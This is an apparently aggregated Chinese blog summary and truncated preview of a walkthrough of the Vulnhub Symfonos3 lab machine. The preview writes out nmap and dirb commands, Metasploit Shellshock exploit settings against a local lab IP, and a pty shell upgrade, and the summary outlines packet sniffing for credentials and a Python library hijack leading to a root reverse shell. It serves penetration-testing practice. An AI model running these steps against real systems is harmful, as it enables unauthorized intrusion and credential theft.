史上最具参考性的云计算和网络安全技术实践博客。
今天看啥  ›  专栏  ›  云计算和网络安全技术实践

vulnhub之symfonos3的实践

云计算和网络安全技术实践  · 公众号  ·  · 2024-09-09 15:17
    

主要观点总结

本文描述了使用Vulnhub的Symfonos3镜像进行渗透测试的过程,包括导入镜像、端口扫描、服务路径暴破、利用Shellshock漏洞获取Shell、修改攻击机端口、下载并运行pspy64获取关键文件,使用tcpdump抓包,最后通过修改Python库文件反弹shell的过程。

关键观点总结

关键观点1: 导入镜像并获取靶机IP地址。

使用Workstation导入Symfonos3镜像,直接在console上查看靶机的IP地址。

关键观点2: 端口扫描和服务路径暴破。

使用nmap进行端口扫描,发现靶机开放的端口及服务,通过dirb进行路径暴破,获取到http://192.168.88.138/cgi-bin。

关键观点3: 利用Shellshock漏洞获取Shell。

猜测http://192.168.88.138/cgi-bin存在Shellshock漏洞,利用MSF(Metasploit Framework)搜索并利用该漏洞,获取到靶机的Shell。

关键观点4: 修改攻击机端口和下载pspy64。

在MSF的shell下设置攻击机端口,下载pspy64工具,通过该工具获取到关键文件/opt/ftpclient/ftpclient.py。

关键观点5: 使用tcpdump抓包和反弹shell。

使用tcpdump在靶机上抓包,获取用户名和密码。然后利用Python库文件替换技巧反弹shell,最终获得root权限。


文章预览

本周实践的是vulnhub的symfonos3镜像, 下载地址,https://download.vulnhub.com/symfonos/symfonos3v2.7z, 用workstation导入成功, console上直接能看到靶机的ip地址,192.168.88.138, 接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.88.138, 发现靶机开了21端口的ftp服务、22端口的ssh服务、80端口的http服务, 对http服务的路径进行暴破,dirb http://192.168.88.138, 获取到http://192.168.88.138/cgi-bin, 对http://192.168.88.138/cgi-bin进一步扫描, 获取到http://192.168.88.138/cgi-bin/underworld, cgi猜测有shellshock漏洞,在msf里搜索利用方法search shellshock, use exploit/multi/http/apache_mod_cgi_bash_env_exec show options set RHOSTS 192.168.88.138 set TARGETURI /cgi-bin/underworld exploit 获取到msf的shell,然后修改攻击机端口再获取一个,set LPORT 4455, 在其中一个msf的shell下进入普通shell, 转成交互式的,python -c 'import pty;pty.spawn("/bin/bash")' ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照
总结与预览地址:访问总结与预览